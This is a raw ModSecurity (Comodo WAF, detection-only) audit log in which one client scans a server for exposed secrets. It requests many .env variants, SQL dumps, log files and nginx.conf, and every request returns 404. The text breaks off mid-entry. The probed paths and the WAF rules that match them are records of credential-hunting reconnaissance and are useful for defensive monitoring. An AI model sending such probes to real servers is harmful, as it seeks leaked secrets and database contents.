Server: Apache Engine-Mode: "DETECTION_ONLY" --bdfcd14d-Z-- --ec47db1c-A-- [17/Jun/2025:05:13:18.404885 +0530] aFCsFlJfblPUQiSn5r2RwwAAAAA 185.177.72.204 51028 127.0.0.1 7080 --ec47db1c-B-- GET /local/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ec47db1c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec47db1c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/local/.env"] [unique_id "aFCsFlJfblPUQiSn5r2RwwAAAAA"] Stopwatch: 1750117398401879 3051 (- - -) Stopwatch2: 1750117398401879 3051; combined=1873, p1=362, p2=1414, p3=22, p4=25, p5=50, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ec47db1c-Z-- --e35bfd24-A-- [17/Jun/2025:05:13:18.954521 +0530] aFCsFgJ4p5Cdblnjra54FgAAAAI 185.177.72.204 51072 127.0.0.1 7080 --e35bfd24-B-- GET /logs/debug.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --e35bfd24-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --e35bfd24-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/logs/debug.log"] [unique_id "aFCsFgJ4p5Cdblnjra54FgAAAAI"] Stopwatch: 1750117398951990 2573 (- - -) Stopwatch2: 1750117398951990 2573; combined=1592, p1=327, p2=1177, p3=17, p4=21, p5=50, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e35bfd24-Z-- --0f0fb944-A-- [17/Jun/2025:05:13:19.064879 +0530] aFCsF9yZ4SMykfn97vy3owAAAAs 185.177.72.204 51084 127.0.0.1 7080 --0f0fb944-B-- GET /logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0f0fb944-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f0fb944-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/logs/error.log"] [unique_id "aFCsF9yZ4SMykfn97vy3owAAAAs"] Stopwatch: 1750117399061762 3160 (- - -) Stopwatch2: 1750117399061762 3160; combined=1969, p1=351, p2=1519, p3=19, p4=26, p5=53, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0f0fb944-Z-- --0c97e123-A-- [17/Jun/2025:05:13:19.394466 +0530] aFCsFwJ4p5Cdblnjra54FwAAAAI 185.177.72.204 32882 127.0.0.1 7080 --0c97e123-B-- GET /mail/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0c97e123-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c97e123-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/mail/.env"] [unique_id "aFCsFwJ4p5Cdblnjra54FwAAAAI"] Stopwatch: 1750117399392287 2220 (- - -) Stopwatch2: 1750117399392287 2220; combined=1376, p1=324, p2=978, p3=12, p4=18, p5=44, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0c97e123-Z-- --eef46975-A-- [17/Jun/2025:05:13:19.504360 +0530] aFCsFwrsPejRtmHkrKLgtwAAAAE 185.177.72.204 32886 127.0.0.1 7080 --eef46975-B-- GET /mailer/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --eef46975-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --eef46975-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/mailer/.env"] [unique_id "aFCsFwrsPejRtmHkrKLgtwAAAAE"] Stopwatch: 1750117399501647 2755 (- - -) Stopwatch2: 1750117399501647 2755; combined=1656, p1=387, p2=1177, p3=19, p4=22, p5=51, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --eef46975-Z-- --6cc2504f-A-- [17/Jun/2025:05:13:20.054066 +0530] aFCsGJVkCcfT-Z8NQYzFHgAAAAc 185.177.72.204 32928 127.0.0.1 7080 --6cc2504f-B-- GET /main/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --6cc2504f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --6cc2504f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/main/.env"] [unique_id "aFCsGJVkCcfT-Z8NQYzFHgAAAAc"] Stopwatch: 1750117400051365 2744 (- - -) Stopwatch2: 1750117400051365 2744; combined=1612, p1=358, p2=1164, p3=17, p4=22, p5=51, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --6cc2504f-Z-- --3c6a1f30-A-- [17/Jun/2025:05:13:22.371987 +0530] aFCsGgrsPejRtmHkrKLgvAAAAAE 185.177.72.204 33060 127.0.0.1 7080 --3c6a1f30-B-- GET /mysql.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3c6a1f30-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c6a1f30-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/mysql.sql"] [unique_id "aFCsGgrsPejRtmHkrKLgvAAAAAE"] Stopwatch: 1750117402368986 3044 (- - -) Stopwatch2: 1750117402368986 3044; combined=1858, p1=331, p2=1429, p3=19, p4=24, p5=55, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3c6a1f30-Z-- --01d2d80e-A-- [17/Jun/2025:05:13:22.592022 +0530] aFCsGgGFf516NUzzD0B3hAAAAAg 185.177.72.204 33072 127.0.0.1 7080 --01d2d80e-B-- GET /mysqldump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --01d2d80e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --01d2d80e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/mysqldump.sql"] [unique_id "aFCsGgGFf516NUzzD0B3hAAAAAg"] Stopwatch: 1750117402589500 2564 (- - -) Stopwatch2: 1750117402589500 2564; combined=1576, p1=289, p2=1199, p3=17, p4=21, p5=50, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --01d2d80e-Z-- --11310869-A-- [17/Jun/2025:05:13:22.812445 +0530] aFCsGooVQnPDyHnl9oPT5AAAAAY 185.177.72.204 33100 127.0.0.1 7080 --11310869-B-- GET /new/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --11310869-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --11310869-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/new/.env"] [unique_id "aFCsGooVQnPDyHnl9oPT5AAAAAY"] Stopwatch: 1750117402809424 3067 (- - -) Stopwatch2: 1750117402809424 3067; combined=1873, p1=379, p2=1397, p3=20, p4=24, p5=53, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --11310869-Z-- --a48b3c47-A-- [17/Jun/2025:05:13:22.922400 +0530] aFCsGtyZ4SMykfn97vy3rQAAAAs 185.177.72.204 33110 127.0.0.1 7080 --a48b3c47-B-- GET /new/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a48b3c47-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a48b3c47-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/new/.env.local"] [unique_id "aFCsGtyZ4SMykfn97vy3rQAAAAs"] Stopwatch: 1750117402919664 2778 (- - -) Stopwatch2: 1750117402919664 2778; combined=1628, p1=386, p2=1153, p3=18, p4=22, p5=49, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a48b3c47-Z-- --4347607c-A-- [17/Jun/2025:05:13:23.033068 +0530] aFCsG1JfblPUQiSn5r2RzwAAAAA 185.177.72.204 33120 127.0.0.1 7080 --4347607c-B-- GET /new/.env.production HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4347607c-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --4347607c-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/new/.env.production"] [unique_id "aFCsG1JfblPUQiSn5r2RzwAAAAA"] Stopwatch: 1750117403029666 3478 (- - -) Stopwatch2: 1750117403029666 3478; combined=2237, p1=507, p2=1597, p3=27, p4=35, p5=71, sr=134, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4347607c-Z-- --c504227d-A-- [17/Jun/2025:05:13:23.143351 +0530] aFCsG4oVQnPDyHnl9oPT5QAAAAY 185.177.72.204 33136 127.0.0.1 7080 --c504227d-B-- GET /new/.env.staging HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c504227d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c504227d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/new/.env.staging"] [unique_id "aFCsG4oVQnPDyHnl9oPT5QAAAAY"] Stopwatch: 1750117403140458 2949 (- - -) Stopwatch2: 1750117403140458 2949; combined=1840, p1=363, p2=1377, p3=21, p4=27, p5=52, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c504227d-Z-- --8017f709-A-- [17/Jun/2025:05:13:23.253791 +0530] aFCsG9yZ4SMykfn97vy3rgAAAAs 185.177.72.204 33148 127.0.0.1 7080 --8017f709-B-- GET /nginx.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8017f709-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8017f709-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/nginx.conf"] [unique_id "aFCsG9yZ4SMykfn97vy3rgAAAAs"] Stopwatch: 1750117403250585 3251 (- - -) Stopwatch2: 1750117403250585 3251; combined=2004, p1=333, p2=1572, p3=19, p4=25, p5=54, sr=99, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8017f709-Z-- --93e44229-A-- [17/Jun/2025:05:13:23.364224 +0530] aFCsG1JfblPUQiSn5r2R0AAAAAA 185.177.72.204 33150 127.0.0.1 7080 --93e44229-B-- GET /nginx/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --93e44229-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --93e44229-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/nginx/.env"] [unique_id "aFCsG1JfblPUQiSn5r2R0AAAAAA"] Stopwatch: 1750117403361201 3084 (- - -) Stopwatch2: 1750117403361201 3084; combined=1887, p1=364, p2=1406, p3=20, p4=26, p5=71, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --93e44229-Z-- --a3856a34-A-- [17/Jun/2025:05:13:23.474694 +0530] aFCsGwGFf516NUzzD0B3hgAAAAg 185.177.72.204 33152 127.0.0.1 7080 --a3856a34-B-- GET /node/.env_example HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --a3856a34-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --a3856a34-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/node/.env_example"] [unique_id "aFCsGwGFf516NUzzD0B3hgAAAAg"] Stopwatch: 1750117403471545 3194 (- - -) Stopwatch2: 1750117403471545 3194; combined=1959, p1=403, p2=1458, p3=21, p4=25, p5=52, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a3856a34-Z-- --b0b10c77-A-- [17/Jun/2025:05:13:23.584316 +0530] aFCsG9yZ4SMykfn97vy3rwAAAAs 185.177.72.204 33156 127.0.0.1 7080 --b0b10c77-B-- GET /node_modules/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b0b10c77-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --b0b10c77-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/node_modules/.env"] [unique_id "aFCsG9yZ4SMykfn97vy3rwAAAAs"] Stopwatch: 1750117403581776 2582 (- - -) Stopwatch2: 1750117403581776 2582; combined=1587, p1=421, p2=1095, p3=12, p4=20, p5=39, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b0b10c77-Z-- --96ec704f-A-- [17/Jun/2025:05:13:23.694461 +0530] aFCsG2MOUduHrxpwbslYfQAAAAM 185.177.72.204 33172 127.0.0.1 7080 --96ec704f-B-- GET /old/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --96ec704f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --96ec704f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/old/.env"] [unique_id "aFCsG2MOUduHrxpwbslYfQAAAAM"] Stopwatch: 1750117403691565 2939 (- - -) Stopwatch2: 1750117403691565 2939; combined=1704, p1=426, p2=1192, p3=17, p4=23, p5=46, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --96ec704f-Z-- --c5845024-A-- [17/Jun/2025:05:13:24.269655 +0530] aFCsHAJ4p5Cdblnjra54HwAAAAI 185.177.72.204 33208 127.0.0.1 7080 --c5845024-B-- GET /pg_dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --c5845024-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5845024-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of 